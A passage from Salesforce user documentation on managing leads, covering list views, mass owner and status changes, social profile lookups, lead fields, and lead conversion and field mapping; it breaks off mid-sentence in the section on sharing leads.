
The leads list page displays a list of leads in your current view.To show a filtered list of items, select a predefined list from the
View drop-down list, or click Create New View to define your own custom views.To edit or delete any view you created,
select it from the View drop-down list and click Edit.

• Click a lead name to view the lead detail. Click Edit or Del next to a lead to edit or delete it.

• Click New Lead or select Lead from the Create New drop-down list in the sidebar to create a lead.

• Choose the My Unread Leads view to see all of your new leads; unread leads are leads you own that you have not yet viewed
or edited.

• If Chatter is enabled, click  or  to follow or stop following a lead in your Chatter feed.
• To change the Owner or Status for multiple leads, display your list view, then select the box next to one or more leads.

Then click the Change Owner or Change Status button.

If you change the status of a lead you own using the Change Status button, the Unread By Owner checkbox is still
selected.

• To take ownership of leads in a queue, view the queue list view and select the box next to one or more leads. Then click
Accept.

987

Viewing Lead ListsTracking Potential Opportunities as Leads



Note:  The organization-wide sharing model for an object determines the access users have to that object's records
in queues:

Public Read/Write/Transfer

Users can view and take ownership of records from any queue.

Public Read/Write or Public Read Only

Users can view any queue but only take ownership of records from queues of which they are a member or,
depending on sharing settings, if they are higher in the role or territory hierarchy than a queue member.

Private

Users can only view and accept records from queues of which they are a member or, depending on sharing
settings, if they are higher in the role or territory hierarchy than a queue member.

Regardless of the sharing model, users must have the “Edit” permission to take ownership of records in queues
of which they are a member. Administrators, users with the “Modify All” object-level permission for Cases, and
users with the “Modify All Data” permission, can view and take records from any queue regardless of the sharing
model or their membership in the queue.

• To add leads to an existing campaign, select the box next to one or more leads. Then click Add to Campaign.

• Click the Open Calendar link at the bottom of the page to display a weekly view of a calendar underneath the list.
Then, you can drag a record from the list to a time slot on the calendar to quickly create an event associated with the record.
Note that your administrator controls the availability of drag-and-drop scheduling.

Note:  Professional, Enterprise, Unlimited, and Developer Edition organizations can grant additional access to leads
beyond what the organization-wide sharing settings allow.

See Also:
Leads Overview
Leads Home
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Changing Multiple Leads
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Leads”To change the status of leads:

“Transfer Leads” OR “Transfer Record”

AND

“Edit” on leads

To change the ownership of leads:

Marketing User checked in your user record

AND

“Read” on leads

AND

“Edit” on campaigns

To add leads to campaigns from a list view:

You can take ownership of leads from any queue list view on a lead list page if:

• You are a member of that queue

• You are higher in the role hierarchy than a queue member

• The organization's default sharing for leads is Public Read/Write/Transfer

Note:  Administrators can mass update multiple leads from any lead list page.

Select the checkboxes next to the desired leads and click one of the following buttons:

• Accept: Assigns you as the owner of the selected leads and transfers open activities to you.

In organizations that are not Public Read/Write/Transfer for leads, you can take leads only from queues of which you are
a member or if you are higher in the role hierarchy than a queue member.

• Change Status: Changes the Status of the leads to the value you set.

You must have the “Manage Leads” permission and read/write access to the leads to use this feature. If you change the
status of a lead you own using the Change Status button, the Unread By Owner checkbox is still selected.

• Change Owner: Assigns leads to a user or queue you specify. If the new owner is a user—not a queue—associated notes,
attachments, and open activities are also transferred.

To use this feature, you must have the “Transfer Leads“ or “Transfer Record” permission, the “Edit” object permission on
leads, and access to view the leads you are updating.

• Add to Campaign: Adds leads to an existing campaign.
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You must have the Marketing User box checked in your user information, the “Read” permission on leads, and the
“Edit” permission on campaigns to use this feature.

See Also:
Displaying and Editing Leads

Displaying and Editing Leads
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on leadsTo view leads:

“Edit” on leadsTo change leads:

Displaying Leads

Once you have located a lead on the leads home or list pages, click the lead name to display detailed information. If
hover details are enabled, hover over any lookup field on the detail page to view key information about a record before
clicking into that record’s detail page.

Editing Leads

To update a lead, click Edit, and then change the fields you want to update. Optionally, select the Assign using
active assignment rule checkbox below the lead detail to automatically reassign it using the active lead assignment
rule. If the Assign using active assignment rule checkbox is selected and no assignment rule criteria is met,
the lead is assigned to the Default Lead Owner. When you have finished, click Save. You can also click Save & New
to save the current lead and create another.

Note:  Open activities associated with a lead are not reassigned using the active lead assignment rule; to reassign
a lead and its open activities, assign the lead to a new owner.

Viewing Lead Updates and Comments (Chatter)

Display a Chatter feed of updates, comments, and posts about the lead.

Viewing Your Leads’ Social Information

Use the Social Accounts and Contacts feature to view your leads’ social network profiles, see their level of influence in
social media, and watch related YouTube videos.

Lead Related Lists

The lower portion of the display provides information related to the lead, including activities, notes, attachments, and
any campaigns associated with the lead. The related lists you see are determined by your personal customization, and by
any customization your administrator has made to page layouts or your permissions to view related data. You can click
individual items to display additional detail. Click more at the bottom of the page to display more items in the related
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lists. See Using the Open Activities Related List on page 1031 and Using the Activity History Related List on page 1032
for more information.

Note: Hover over the links at the top of a detail page to display the corresponding related list and its records.
If Chatter is enabled, hover links display below the feed. An interactive overlay allows you to quickly view and
manage the related list items. Click a hover link to jump to the content of the related list. If hover links are not
enabled, contact your Salesforce administrator.

Sharing

In Professional, Enterprise, Unlimited, and Developer Edition organizations, share a lead with other users, groups, or
roles by clicking Sharing. See Sharing Leads on page 1010.

Printing Leads

To open a printable display of the record details, in the top-right corner of the page, click Printable View.

To return to the last list page you viewed, click Back to list at the top of the lead detail page. If your organization has enabled
collapsible page sections, use the arrow icons next to the section headings to expand or collapse each section on the detail page.

See Also:
Lead Fields
Guidelines for Creating Leads
Deleting Leads

Using Social Leads
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

When using Social Accounts and Contacts for leads, you can:

• Configure your Social Accounts and Contacts settings so the Social Accounts and Contacts viewer only shows the social
networks that you want to use.

• Sign in to your social network accounts from any lead detail page.

• Find your potential customers’ Facebook, LinkedIn, and Twitter profiles and link them to their lead records, so you can
view this information from lead detail pages.

• Find YouTube videos related to your leads and play them from lead detail pages.

• See your leads’ Klout information from lead detail pages.

• Modify default search criteria if you’re having trouble locating a lead’s social information.

• If your organization uses Data.com Social Key (beta in Summer ‘13) , get leads’ social profiles automatically.

See Also:
Security and Privacy When Using Social Accounts and Contacts
Enabling and Configuring Social Accounts and Contacts
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Signing in to Your Social Network Accounts from Lead
Detail Pages

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on leadsTo sign in to your social network accounts from lead detail
pages:

To get started using Social Accounts and Contacts, you first need to sign in to your social network accounts from any account,
contact, or lead detail page. This creates private connections between Salesforce and your social network accounts, allowing
you to see external social profiles in Salesforce. These connections persist in future Salesforce sessions so you don't have to
sign in to your social network accounts again unless you sign out in the Social Accounts and Contacts viewer.

Note:  You can see YouTube videos without doing these steps. The Klout service is only available when you’re signed
in to your Twitter account..

To sign in to your social network accounts from a lead detail page:

1. On the Leads home page or in a Leads list view, click a lead’s name to display the detail page. You can sign in from any
lead’s detail page that you have permission to read.

2. In the header on the detail page, click a social network icon ( ).
3. Click Sign in button on the Social Accounts and Contacts viewer.
4. Enter your social network account credentials and authorize Salesforce to access your account.
5. If you want to log in to another social network, just click its tab on the viewer.

Note: Salesforce users who are not within either the Salesforce.com or Force.com domains, such as Cloud.com users,
cannot Log into Facebook from within Salesforce.

See Also:
Using Social Leads
Social Accounts, Contacts, and Leads Overview
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Viewing and Associating Your Leads' Social Network
Profiles

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on leadsTo find and link social network profiles to lead records:

“Read” on leadsTo view a lead's social network profiles:

View your leads’ social network profiles right from a record’s detail page. It’s easy. Social Accounts and Contacts lets you find
your customers’ LinkedIn, Twitter, and Facebook profiles (if available) and associate them with your lead records, then view
them directly from lead detail pages. Other users who can view the lead record can also view the profile. If your organization
uses Data.com Social Key (Beta in Summer ’13), we provide the links automatically (if available) for LinkedIn, Twitter, and
Facebook.

Note:  Depending on contacts’s and leads’ privacy settings, as well as the permissions set by their friends or connections
and the site’s terms of use, users may not see as much information as they would if logged directly into their social
network accounts.

1. From the lead’s detail page, click the icon for the social network where you want to view the lead’s profile ( ).
2. If you need to, from the Social Accounts and Contacts viewer, sign in to that social network.
3. If you haven’t yet associated a profile for the lead, select the one you want from those we show you. Viewing a profile

automatically associates it with the lead. If you use Social Key, your record may have a profile already associated.
4. If you need to associate a different profile, click Find Different Profile.
5. If you want to view the lead’s profiles on other social networks, just click their tabs in the viewer.
6. You can also:

• Click Show Photo in Salesforce to display the lead’s profile picture on the lead detail page. When Social Key finds a
LinkedIn handle for a lead, it automatically displays that image on the lead’s detail page. You can choose a different
photo (including photos from Twitter or Facebook) if you wish.

• Click View Full Profile to see the lead’s complete social network profile directly in the social network.
• Click Sign Out to close the private connection between Salesforce and your social network account. When you do this,

you're unable to see your lead’s social network profiles until you sign in again.

See Also:
Using Social Leads
Viewing YouTube Videos about Your Leads
Viewing Your Leads' Klout Information
Data.com Social Key Overview—Beta
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Viewing YouTube Videos about Your Leads
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on leadsTo find and view YouTube videos related to leads:

You can use Social Accounts and Contacts to find YouTube videos related to your leads and play them from lead detail pages
in Salesforce.

1. On the Leads home page or in a Leads list view, click a lead’s name to display the detail page.
2. In the header on the detail page, click the YouTube icon ( ).
3. In the YouTube search results, click the video that you want to watch.

Tip:  If the default search doesn't find videos for the correct person, search again using different search terms.

4. The YouTube player opens in the Social Accounts and Contacts viewer and the video begins playing.

See Also:
Using Social Leads
Viewing and Associating Your Leads' Social Network Profiles
Viewing Your Leads' Klout Information

Viewing Your Leads' Klout Information
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on leadsTo view a lead's Klout information:

You can use Social Accounts and Contacts to see your leads’ Klout information, directly from lead detail pages in Salesforce.

Note:

The Klout service is dependent on Twitter—an administrator must enable Twitter in your organization’s Social
Accounts and Contacts settings and you must be signed in to your Twitter account. You don’t need a Klout account,
or have to be signed in to your Klout account, to see Klout information in Salesforce.

Before Klout information is available for a lead, you or someone else in your organization needs to associate a Twitter
profile with the lead record.
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To see Klout information for a lead:

1. On the Leads home page or in a Leads list view, click a lead’s name to display the detail page.
2. In the header on the detail page, click the Klout icon ( ).
3. View the lead’s Klout information.

See Also:
Using Social Leads
Viewing and Associating Your Leads' Social Network Profiles
Viewing YouTube Videos about Your Leads

Tips for Finding Your Leads’ Social Information
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

When you want to associate a social network profile with a lead—either for the first time or if you’re switching to a different
profile using the Find Different Profile button—the Social Accounts and Contacts feature uses the Name field on the lead
record as the default search criteria. The default search criteria is also used when you want to find YouTube videos related to
a lead.

Here are some tips for finding a lead’s social information.

• If the default search can't locate your lead’s social network profile or YouTube videos related to the account, enter different
keywords in the search box on the Social Accounts and Contacts viewer and click Search.

• The name on the lead record may be different from your lead’s social network user name or the name used in YouTube
video keyword tags. Try different variations of the lead’s name; for example, search for Maddie Rigsby instead of
Madison Rigsby.

• If your organization uses Data.com Social Key (beta in Summer ’13), we’ll automatically find and associate your leads'
social handles (if available) from LinkedIn, Twitter, and Facebook, so you can view their profiles and feeds without having
to make associations. If we find more than one potential match for your contact, we’ll let you choose the one you want.

If you still can't find the correct profile, your lead may not have an account in the social network or their privacy settings may
be blocking you from finding their profile in a search. If your YouTube searches are still unsuccessful, the lead may not be
featured in any videos shared on YouTube.

See Also:
Leads Home
Social Accounts, Contacts, and Leads Overview
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Defining Your Social Accounts and Contacts User Settings

Business accounts available in: All Editions except Database.com

Person accounts available in: Enterprise, Unlimited, and Developer Editions

Contacts available in: All Editions except Database.com

Leads available in: Group, Professional, Enterprise, Unlimited, and Developer Editions
Data.com Clean available in: Developer, Enterprise, and Professional editions

Data.com Clean available for an additional cost in: Unlimited Edition

Social Key available in: in: Developer, Enterprise, and Professional, and Unlimited editions

If the Social Accounts and Contacts feature is enabled for your organization, you can customize it so it works the way you
want it to. You can also turn the feature off if you don’t want to use it.

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left pane, select one of the following:

• If you clicked Setup, select My Social Accounts and Contacts > Settings.
• If you clicked My Settings, select Display & Layout > My Social Accounts and Contacts.

3. Set up Social Accounts and Contacts so it works the way you want it to.
4. Click Save.

See Also:
Social Accounts, Contacts, and Leads Overview
Security and Privacy When Using Social Accounts and Contacts
Social Accounts, Contacts, and Leads Overview
Tips for Finding Your Contacts' Social Information
Using Social Leads

Guidelines for Creating Leads
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create” on leadsTo create leads:

Keep these guidelines and tips in mind when creating leads.
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• You can create new leads in various ways. Your administrator can set up Web-to-Lead to automatically capture leads from
your website and can import new leads using the wizard, or you can create new leads manually. You can also find Data.com
contacts and add them as leads.

• When creating a lead from the Leads tab, select Assign using active assignment rules to assign the lead
automatically using the active lead assignment rule. If you don’t check the box, you are assigned as the owner.

• If your organization uses record types, you might be prompted to choose a Record Type when creating a lead. Different
record types can have different fields and different picklist values.

• If your organization uses divisions, the division of a new lead is automatically set to your default division, unless you
manually select a different one.

Note:  When you manually create a new lead:

• You are automatically assigned as the owner.

• The Lead Status is initially set to the default status specified by your administrator.

• If you select the assignment rule checkbox, the record type of the lead might change, depending on what behavior
your administrator specified or customized for assignment rules..

• The lead is marked as “Read” and will not appear in the My Unread Leads list view. However, if you save the lead
using the Save & New button, the lead is marked as “Unread.”

See Also:
Cloning Leads
Lead Fields

Cloning Leads
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create” on leadsTo clone leads:

The Clone button on a lead quickly creates a new lead with the same information as the existing lead.

To clone a lead, click Clone on an existing lead. Enter or change any information for the new lead. Select the checkbox to
assign the lead automatically using the active lead assignment rule. Click Save.

Note:  If you have read-only access to a field, the value of that field is not carried over to the cloned record.

See Also:
Lead Fields
Guidelines for Creating Leads
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Lead Fields
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

A lead has the following fields, listed in alphabetical order. Depending on your page layout and field-level security settings,
some fields may not be visible or editable.

If the lead record was added from Data.com, certain fields, as identified here, will be populated with the Data.com or Dun &
Bradstreet (D&B) value, if a value is available. Some Data.com lead fields are available only to organizations that use a specific
Data.com product. Those fields are identified in their descriptions, here.

Accepts Data.com or D&B ValueDescriptionField

 (Data.com)Street address for the lead, for example,
475 Boardwalk Ave. Up to 255 characters
are allowed in this field.

Address

 (D&B)Amount of annual revenue at lead’s
company.

Annual Revenue

Name of the campaign responsible for
generating the lead. Displays only when

Campaign

creating a new lead. Data entered in this
field is stored in the Campaign History
related list on the lead.

 (Data.com)City portion of the lead’s address, for
example, San Francisco. Up to 40
characters are allowed in this field.

City

 (Data.com)Indicates the record’s clean status as
compared with Data.com. Values are:

Clean Status

Not Compared, In Sync,
Reviewed, Different, Not
Found, or Inactive. This field is
available to only organizations that use
Data.com Prospector or Data.com Clean.

 (D&B)Name of company with which lead is
affiliated. Up to 255 characters are
allowed in this field.

Company

 (D&B)Data Universal Numbering System
(D-U-N-S) number is a unique,

Company D-U-N-S Number

nine-digit number assigned to every
business location in the D&B database
that has a unique, separate, and distinct
operation. D-U-N-S numbers are used
by industries and organizations around
the world as a global standard for

998

Lead FieldsTracking Potential Opportunities as Leads



Accepts Data.com or D&B ValueDescriptionField

business identification and tracking. This
field is available to only organizations
that use Data.com Prospector or
Data.com Clean.

Note:

To see the entire D-U-N-S
number, either

• Add the lead to Salesforce if
you haven’t yet, or

• Clean the lead with
Data.com if it already exists
in Salesforce

Until you add or clean the
record, its first five digits will be
masked with asterisks (*).

Name of the company in the local
language.

Company Name (Local)

 (Data.com)Country portion of the lead’s address. Up
to 80 characters are allowed in this field.

Country

The country for the address. Entry is
selected from a picklist of standard
values.

Country (beta)

User who created the lead, including
creation date and time. (Read only)

Created By

 (D&B)A link to the corresponding D&B
Company record, which displays Dun &

D&B Company

Bradstreet (D&B) fields for the lead. Use
the lookup if you need to associate a
different D&B Company record with the
lead. This field is only available to
organizations that use Data.com
Premium Prospector or Data.com
Premium Clean.

 (Data.com)The ID of the company in Data.com.
When Salesforce records are compared

Data.com Key

with Data.com records (via either manual
cleaning or automated clean jobs), if
Data.com finds a match, the two records
are linked by this field’s numeric value.
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Accepts Data.com or D&B ValueDescriptionField

Description of the lead. Up to 32KB of
data are allowed in this field. Only the
first 255 characters appear in reports.

Description

Indicates that the lead does not want to
be contacted by phone. If you use

Do Not Call

Data.com, the Phone field value will be
masked out in search results and on the
Contact Card, and it will be blank in
.csv files created when you export
records.

 (Data.com)Email address of lead. Must be a valid
email address in the form:

Email

jsmith@acme.com. Up to 80 characters
are allowed in this field.

Click the email address in this field to
send an email using your personal email
application. If the Gmail Buttons and
Links feature is enabled, you can click
the Gmail link next to the field to send
an email from your Gmail account. See
Using Gmail in Salesforce on page 2536
for more information.

Indicates that the lead does not want to
receive email. If you use Data.com, the

Email Opt Out

Email field value will be masked out in
search results and on the Contact Card,
and it will be blank in .csv files created
when you export records.

Lead’s fax number. Up to 40 characters
are allowed in this field.

Fax

Lead has not requested to be included in
broadcast faxes.

Fax Opt Out

 (Data.com)First name of the lead, as displayed on
the lead edit page. Up to 40 characters
are allowed in this field.

First Name

First name of the lead translated into the
local language.

First Name (Local)

 (Data.com)Primary business of lead’s company.
Entry is selected from a picklist of

Industry

available values, which are set by an
administrator. Each picklist value can
have up to 40 characters.
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Accepts Data.com or D&B ValueDescriptionField

 (Data.com)Last name of the lead, as displayed on
the lead edit page. Up to 80 characters
are allowed in this field.

Last Name

Last name of the lead translated into the
local language.

Last Name (Local)

The date the lead owner was last
changed.

Last Transfer Date

The default currency for all currency
amount fields in the lead. Amounts

Lead Currency

display in the lead currency and are also
converted to the user’s personal currency.
Available only for organizations that use
multiple currencies.

Division to which the lead belongs.
Available only in organizations that use
divisions to segment their data.

Lead Division

Assigned owner of the lead.Lead Owner

Name of the field that determines what
picklist values are available for the record.

Lead Record Type

The record type may be associated with
a lead process. Available in Enterprise,
Unlimited, and Developer Editions.

 (Data.com)Source of lead, for example,
Advertisement, Partner, or Web. Entry

Lead Source

is selected from a picklist of available
values, which are set by an administrator.
Each picklist value can have up to 40
characters.

Status of the lead, for example, Open,
Contacted, Qualified. Entry is selected

Lead Status

from a picklist of available values, which
are set by an administrator. Each picklist
value can have up to 40 characters.

Cellular or mobile phone number. Up to
40 characters are allowed in this field.

Mobile

User who last changed the lead fields,
including modification date and time.

Modified By

This does not track changes made to any
of the related list items on the lead.
(Read only)
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Accepts Data.com or D&B ValueDescriptionField

 (Data.com)Combined first and last name of lead, as
displayed on lead detail page.

Name

 (D&B)Number of employees at the lead’s
company.

No. of Employees

 (Data.com)Lead’s primary phone number. Up to 40
characters are allowed in this field.

Phone

Read-only field that indicates the lead is
owned by a partner user.

Partner Account

Indicates value or prospect of the lead,
for example, Hot, Warm, Cold. Entry is

Rating

selected from a picklist of available
values, which are set by an administrator.
Each picklist value can have up to 40
characters.

Flag indicating that the lead has been
viewed or edited by the lead owner. Flag

Read

is not displayed on lead edit or detail
pages. Leads marked as “Read” do not
contain a check mark in the Unread
column on leads list views.

Title for addressing the lead, for example,
Mr., Ms., Dr., or Prof. Entry is selected

Salutation

from a picklist of available values, which
are set by an administrator. Each picklist
value can have up to 40 characters.

 (Data.com)State or province portion of the lead’s
address. Up to 80 characters are allowed
in this field.

State

The state or province for the address.
Entry is selected from a picklist of
standard values.

State/Province (beta)

 (Data.com)Position of lead within his or her
company. Up to 80 characters are allowed
in this field.

Title

Flag indicating that the lead has not been
viewed or edited by the lead owner. Flag

Unread

is not displayed on lead edit or detail
pages. Leads marked as “Unread” contain
a check mark in the Unread column on
leads list views.
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Accepts Data.com or D&B ValueDescriptionField

Listing of custom links for leads as set
up by your administrator.

Custom Links

URL of company’s website, for example,
www.acme.com. Up to 255 characters

Website

are allowed in this field; only the first 50
are displayed.

 (Data.com)ZIP code or postal code portion of the
lead’s address. Up to 20 characters are
allowed in this field.

ZIP

See Also:
Lead Conversion Mapping
Displaying and Editing Leads

Lead History
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on leadsTo view leads:

The Lead History related list of a lead detail page tracks the changes to the lead. Any time a user modifies any of the standard
or custom fields whose history is set to be tracked on the lead, a new entry is added to the Lead History related list. All entries
include the date, time, nature of the change, and who made the change. Modifications to the related lists on the lead are not
tracked in the lead history.

For automated lead changes that result from Web-to-Lead, the user listed in the history is the Default Lead Creator
chosen in the Web-to-Lead Settings.

See Also:
Displaying and Editing Leads
Leads Home
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Converting Leads
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create” and “Edit” on leads, accounts, contacts, and
opportunities

AND

“Convert Leads”

AND

“Read” on any related campaigns

To convert leads:

To convert a lead:

1. From the lead detail page, click Convert.
2. Optionally, change the owner of the new records. This reassigns all notes, attachments, and open activities to the new

owner but does not change closed activities. Select the Send Email to the Owner checkbox to send an automated
email to the new owner.

Note:  If you have a trigger set to fire when new records are created, the trigger temporarily assigns a system user
as the owner of the created records. After the trigger finishes, the owner is set to the lead owner.

3. In the Account Name field, select a new account or search for an existing account. Click View to open a printable view
of the existing account. Information from the lead is inserted only into blank fields; it will not overwrite existing account
data.

4. If you update an existing person account, select the checkbox to overwrite the Lead Source field in the person account
with the value from the lead.

5. In the Opportunity Name field, enter a name for the new opportunity, or select the Do not create a new
opportunity upon conversion checkbox if you don’t want to create an opportunity.

6. In the Converted Status picklist, select a status for the converted lead. Choices include statuses marked as “converted”
by your administrator.

7. Optionally, fill in the following fields to schedule a follow-up task that is automatically assigned to the record owner:

• Subject—Subject or short description of the task, for example, “Email quote to customer.” You can enter a subject,
or select from a picklist of previously defined subjects.

• Due Date (optional)—Date when the task should be completed. You can enter a date, or choose a date from the
calendar that displays when you put your cursor in the field.

• Activity Currency—You’ll see this field if your organization uses multiple currencies. Select a currency to associate
with this task.

• Comments (optional)—Text note describing the task. This field can hold up to 32KB of data.
• Status—Current status of task, for example, Not Started or Completed. (Picklist selections can be customized by

your administrator.)
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• Priority—Urgency of the task, for example, Low, Medium, or High. (Picklist selections can be customized by your
administrator.)

• Send Notification Email (optional)—Select this checkbox to send a notification about this task to the assignee.
• Reminder (optional)—Select this checkbox to schedule a reminder for this task.

8. Click Convert.
9. If a duplicate contact exists, choose whether to create a new contact or update the existing contact. Information from the

lead is inserted only into blank fields; it will not overwrite existing contact data.
10. When updating an existing contact, check the box if you want to overwrite the Lead Source field in the contact with

the value from the lead.
11. Click Convert to finish.

Tip:  Alternatively, you can convert a lead by clicking Find Duplicates from the leads home page. See Merging
Duplicate Leads on page 1011 for more information about converting a lead using the merge utility.

If you haven’t enabled validation and triggers from lead convert, the lead conversion will fail if the data in a custom lead field
isn't supported in the mapped custom contact field. For example, if a custom lead field is mapped to a contact picklist field,
the lead value must be explicitly defined as a contact picklist value. Otherwise the lead won’t be converted. To resolve the
error, ensure that field values are already defined. To prevent the error, we recommend enabling validation and triggers from
lead convert in your organization’s lead settings.

When a lead is converted, Chatter feed posts associated with the lead aren’t migrated. The lead posts are no longer available
in the Chatter feed. All notes and attachments from the lead are converted and attached to the new account and contact. All
open activities and activity history from the lead are converted and attached to the new account, contact, and opportunity.
The converted lead record can no longer be viewed, although it does contribute data to reports. Your organization can set its
own guidelines for determining when a lead is qualified, but typically, you want to convert a lead as soon as it becomes a real
opportunity that you want to forecast.

Note: If validation and triggers for lead convert are enabled in your organization, then converting a lead can trigger
a workflow action on a lead. For example, if there is an active workflow rule that updates a lead field or transfers the
owner of a lead, that rule can trigger when the lead is converted, even if the lead isn’t visible on the Leads tab as a
result of the conversion. Note that if a workflow rule creates a new task as a result of a lead conversion, the task is
assigned to the newly created contact and related to the associated account or opportunity.

See Also:
Understanding Lead Conversion
Lead Conversion Mapping

Understanding Lead Conversion

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

When you convert a lead, Salesforce creates a new account, contact, and, optionally, an opportunity using the information
from the lead. Any campaign members are moved to the new contact and the lead becomes read only. If an existing account
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and contact have the same names as those specified on the lead, you can choose to update the existing account and contact.
Information from the lead is inserted only into blank fields; Salesforce does not overwrite existing account and contact data.

All open and closed activities from the lead are attached to the account, contact, and opportunity. You can assign the owner
of the records, and schedule a follow-up task. When you assign a new owner, only the open activities are assigned to the new
owner. If you have custom lead fields, that information can be inserted into custom account, contact, or opportunity fields.
Converted leads can't be viewed, although they appear in lead reports. Salesforce updates the Last Modified Date and
Last Modified By system fields on converted leads when picklist values included on converted leads are changed.

Consider the following when converting leads.

If the lead matches an existing contact and both records are linked to the same campaign, the campaign
member status is determined by whichever is further along in the lifecycle of the campaign. For

Campaigns

example, if the lead member status is “sent” and the contact member status is “responded,” the
responded value is applied to the contact.

Related campaign information is always associated with the new contact record, regardless of the
user's sharing access to the campaign.

When more than one campaign is associated with a lead, the most recently associated campaign is
applied to the Primary Campaign Source field on the opportunity, regardless of the user's sharing
access to the campaign.

When you convert a lead into an existing account, you don’t automatically follow that account.
However, when you convert the lead into a new account, you automatically follow the new account,
unless you disabled feed tracking for accounts in your Chatter settings.

Chatter

If you use Data.com Premium, when you add a lead from Data.com, a corresponding D&B Company
record (if one exists in Data.com) is automatically created in Salesforce and linked to the lead record
via its D&B Company field. If you later convert that lead:

Data.com / D&B
Company

• If the account is created from the conversion, the lead’s Company D-U-N-S Number field value
transfers to the account’s D-U-N-S Number field, and the lead’s D&B Company field value
transfers to the account’s D&B Company field.

• The lead’s Data.com Key field value transfers to the contact’s Data.com Key field.

If you use Data.com Corporate, no D&B Company record is created, but the lead’s Data.com Key
field value transfers to the contact’s Data.com Key field.

The new account, contact, and opportunity are assigned to the same division as the lead. If you update
an existing account during lead conversion, the account’s division is not changed, and the new contact
and opportunity inherit the account’s division.

Divisions

The Company Name (Local) on the lead automatically maps to Account Name (Local), along
with their associated standard name fields.

Local Lead Names

If your organization uses person accounts, you can convert leads to either person accounts or business
accounts. Leads with a blank Company field are converted to person accounts. The default person

Person Accounts

account record type for your profile is applied to the new person account. Note that you can only
create leads with a blank Company field using the Force.com API. Leads with a value in the Company
field are converted to business accounts. The default business account record type for your profile is
applied to the new business account.
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As a best practice, use different lead record types and page layouts to differentiate leads that will be
converted to person accounts from those that will be converted to business accounts. In particular,
remove the Company field from the page layouts of leads that will be converted to person accounts,
and make the Company field required on the page layouts of leads that will be converted to business
accounts.

If you create a lead, convert it, and then attach it to a person account owned by someone else, the
person account owner becomes the contact owner.

If you convert a lead owned by someone else and attach it to a person account that you own, the lead
owner becomes the contact owner.

If the lead has a record type, the default record type of the user converting the lead is assigned to
records created during lead conversion.

The default record type of the user converting the lead determines the lead source values available
during conversion. If the desired lead source values are not available, add the values to the default
record type of the user converting the lead.

Record Types

When you convert a lead, Salesforce to Salesforce inactivates the shared record and updates the
External Sharing related list in your connection's lead record with an Inactive (converted) status. Due

Salesforce to
Salesforce

to inactivation of the shared record, changes to the Lead Status during conversion aren't reflected in
your connection's lead record.

The system automatically maps standard lead fields to standard account, contact, and opportunity
fields.

For custom lead fields, your administrator can specify how they map to custom account, contact, and
opportunity fields.

Standard and Custom
Lead Fields

The system assigns the default picklist values for the account, contact, and opportunity when mapping
standard lead picklist fields that are blank. If your organization uses record types, blank values are
replaced with the default picklist values of the new record owner.

If your organization uses territory management, the new account is evaluated by account assignment
rules and may be assigned to one or more territories. If the rules assign the account to exactly one

Territory Management

territory, then the opportunity will also be assigned to that territory. If the rules assign the account
to multiple territories, then the opportunity is not assigned to any territory.

During lead convert, Apex triggers are fired, and universally required custom fields and validation
rules are enforced, only if validation and triggers for lead convert are enabled in your organization.

Salesforce ignores lookup filters when converting leads if the Enforce Validation and Triggers
from Lead Convert checkbox on the Lead Settings page is deselected.

Triggers

You can’t convert a lead that’s associated with an active approval process or has pending workflow
actions.

Converting a lead to a person account won’t trigger workflow rules.

Workflow
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When a lead is converted by someone who isn't the lead owner, all workflow tasks associated with
the lead that are assigned to that user, except email alerts, are reassigned to the lead owner. Workflow
tasks assigned to users other than the lead owner and lead converter aren't changed.

See Also:
Converting Leads
Lead Conversion Mapping

Lead Conversion Mapping

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

When you convert a lead, the standard lead fields are automatically converted to the account, contact, and opportunity fields
listed below. Custom lead fields are converted to custom account, contact, and opportunity fields as specified by your
administrator.

Maps toLead Field

Account: Billing Address

Contact: Mailing Address

Address

Account: Annual RevenueAnnual Revenue

Opportunity: Primary Campaign Source

If the lead has multiple associated campaigns, the most recently
associated campaign is inserted into the opportunity regardless
of whether the user has sharing access to it.

Campaign

Account: Account Name

Contact: Account

Company

Opportunity: Account Name

Opportunity: Opportunity Name

Account: Account Name (Local)Company Name (Local)

Contact: DescriptionDescription

Contact: Do Not Call

This field is not updated for leads converted to existing
contacts.

Do Not Call

Contact: EmailEmail
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Maps toLead Field

Contact: Email Opt Out

This field is not updated for leads converted to existing
contacts.

Email Opt Out

Account: Fax

Contact: Fax

Fax

Contact: Fax Opt OutFax Opt Out

Contact: First NameFirst Name

Contact: First Name (Local)First Name (Local)

Account: IndustryIndustry

Contact: Last NameLast Name

Contact: Last Name (Local)Last Name (Local)

Account: Owner

Contact: Owner

Lead Owner

Opportunity: Owner

Contact: Lead Source

Opportunity: Lead Source

Lead Source

Contact: MobileMobile

Account: EmployeesNo. of Employees

Opportunity: Partner Account

This field is not updated for leads converted to existing
opportunities.

Partner Account

Account: Phone

Contact: Phone

Phone

Account: RatingRating

Contact: TitleTitle

Account: WebsiteWebsite
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Note:  If you are not using custom fiscal years, the Close Date of the newly created opportunity is automatically
set to the last day of the current fiscal quarter.

If you are using custom fiscal years, the Close Date is the last day of the current fiscal period. If you are using
custom fiscal years and a fiscal year has not been defined for the current date, the Close Date is the end of the
current calendar quarter.

See Also:
Converting Leads
Understanding Lead Conversion

Sharing Leads
Available in: Enterprise, Unlimited, and Developer Editions

Your administrator defines the organization sharing model; however, you can extend sharing privileges for your own data on
a lead-by-lead basis. You can use lead sharing to increase access to your leads; you cannot restrict access beyond your
